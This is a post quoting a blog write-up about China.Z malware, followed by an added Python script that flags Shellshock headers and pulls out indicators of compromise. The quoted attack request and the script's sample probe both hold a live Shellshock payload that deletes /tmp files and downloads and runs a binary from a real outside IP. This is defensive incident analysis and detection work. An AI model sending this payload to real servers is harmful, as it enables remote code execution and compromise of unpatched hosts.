China.z Malware info

My prod server had a security issue; the page quoted below describes the same case:

From: http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However, some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

Also, you can follow these pages as a workaround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html
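The request quoted above is a Shellshock probe: the value of an HTTP header starts with the bash function-export marker `() {`, and on a server that passes headers to bash through the environment (classic CGI), the commands after the `};` run. The script below is an added example, not code from the quoted post or from any of the linked write-ups. It does two things a responder wants after seeing such a request: flag headers whose value begins with that marker, and pull the download URL and dropped file paths out of the payload so they can go into a blocklist or hunt query. The header samples are constructed; the IP, port and `/tmp` filenames in the probe sample are the ones the quoted request shows, and the benign request is made up.

```python
"""Flag Shellshock-style HTTP headers and extract IOCs from the payload.

Added example for this page; the sample requests are constructed, not
captured traffic. The probe sample reuses the IP and filenames that the
quoted request shows.
"""
import re

# CVE-2014-6271 triggers when a value bash imports from the environment
# begins with the function-export marker "() {". Scanners vary the
# whitespace, so match loosely.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Download targets (wget/curl arguments) and files dropped under /tmp.
URL_RE = re.compile(r"https?://[^\s\"';>]+")
TMP_PATH_RE = re.compile(r"/tmp/[\w.\-]+")

# Constructed samples: one benign request, one probe mirroring the quoted
# payload, one compact variant with no spaces inside the marker.
SAMPLE_HEADERS = {
    "benign": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
        "Accept": "*/*",
    },
    "probe": {
        "User-Agent": (
            '() { :; }; /bin/bash -c "rm -rf /tmp/*; '
            "echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh; "
            "echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh; "
            "echo /tmp/China.Z-rpvd >> /tmp/Run.sh; "
            'chmod 777 /tmp/Run.sh; /tmp/Run.sh"'
        ),
        "Accept": "*/*",
    },
    "compact": {
        "User-Agent": "curl/7.29.0",
        # hypothetical variant written without inner spaces
        "Referer": "() {:;}; echo vulnerable",
    },
}


def find_shellshock(headers):
    """Return the names of headers whose value starts with the marker.

    Every header is a candidate because CGI exports all of them as HTTP_*
    environment variables, which is exactly what bash imports.
    """
    return [name for name, value in headers.items() if SHELLSHOCK_RE.match(value)]


def extract_iocs(payload):
    """Pull download URLs and dropped /tmp paths out of a payload string.

    Order of first appearance is kept and duplicates are removed so the
    result can be pasted straight into a blocklist or search query.
    """
    urls = list(dict.fromkeys(URL_RE.findall(payload)))
    paths = list(dict.fromkeys(TMP_PATH_RE.findall(payload)))
    return {"urls": urls, "paths": paths}


def triage(samples):
    """Run both checks over a dict of name -> headers and collect results."""
    report = {}
    for name, headers in samples.items():
        hits = find_shellshock(headers)
        iocs = {"urls": [], "paths": []}
        for header in hits:
            found = extract_iocs(headers[header])
            iocs["urls"] += [u for u in found["urls"] if u not in iocs["urls"]]
            iocs["paths"] += [p for p in found["paths"] if p not in iocs["paths"]]
        report[name] = {"headers": hits, "iocs": iocs}
    return report


if __name__ == "__main__":
    for name, result in triage(SAMPLE_HEADERS).items():
        print(name, result)
```

The marker regex is the detection signal; the IOC extraction is what turns one log line into something actionable (block the download host, search other hosts for the dropped filenames). A match on the marker alone is a probe, not proof of compromise: the quoted post notes its server had no CGI, so the request was noise there, but the same request against an unpatched CGI host would have fetched and run the binary.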

–EOF–